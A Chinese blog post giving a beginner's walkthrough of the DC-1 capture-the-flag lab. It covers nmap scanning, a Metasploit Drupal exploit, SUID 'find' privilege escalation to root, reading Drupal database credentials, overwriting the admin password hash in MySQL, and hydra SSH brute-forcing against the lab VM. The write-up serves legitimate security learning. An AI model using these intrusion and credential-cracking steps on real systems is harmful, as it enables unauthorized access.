DC1通关

环境自己百度装好。

我的一台kali,一台DC都是52网段

1.nmap 扫一扫52网段

确定是143,然后针对143进行扫描

80开放,进去。

 

老熟人了 Drupal,直接msf开打

试了几个,use2直接getshell了

看看权限

 

尝试SUID提权

进入shell

find / -perm -4000 2>/dev/null

 

 看到find了吧

直接提

find -exec /bin/sh \;

 whoami 看看

root了。。。。

然后我看别人的文章,发现要找flag.......我是新手。。。

然后找flag吧

给他一个python的交互式

python -c 'import pty;pty.spawn("/bin/bash")'

找找flag,反正都是root了,flag不是乱翻。

第一个flag翻出来了

就在www的目录下。

每个好的cms都有配置文件

哦哦可能是让我找Drupal的配置文件吧

百度。

 

找到了数据库账号密码和flag2

暴力破解和字典攻击是攻击不了?只能一种方法是获取权限,你将需要权限,你用这些凭证可以做些什么

这里我实在不知道他要干嘛我都已经root了,然后看别人文章。要进cms后台。

先看看3306开没

开了,登陆进去

密码加密了

 

看了这篇文章

分享:忘记Drupal的管理员密码的解决办法 | Drupal China

1. 大概意思就是创建一个用户然后把密码替换掉。

2.

exit           //退出mysql的shell
cd /var/www    //回到网站目录
php scripts/password-hash.sh  自己设置的密码
php scripts/password-hash.sh 123456

 然后进入mysql替换我们的admin管理员密码

刚刚不是生成立123456密码的加密hash嘛,替换掉

update users set pass="$S$DRpm2Iq3nyf0avZoaDyiZzkKwYE6NSSpm5l9hJntFZu9idZFXaUy" where uid=1;

登录进去了,翻一翻,找到了flag3

大概意思就是要去shadow里面找东西。

我们就直接找呗,反正一开始就已经提权了

我是root用户,我直接去翻家目录了

flag4找到了

我感觉大概意思就是让我去翻root的目录。

最终flag。

 

这里我看别人的文章好像使用了hydra的ssh爆破,正好我也复习一下,拿到flag3的时候让我看们去看shadows,因为我直接提权了,所以可以看,别人是看不了shadows去看了passwd,然后在passwd找到了一个flag4用户名。然后用爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.52.143 ssh -vV -f 

 密码是orange

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值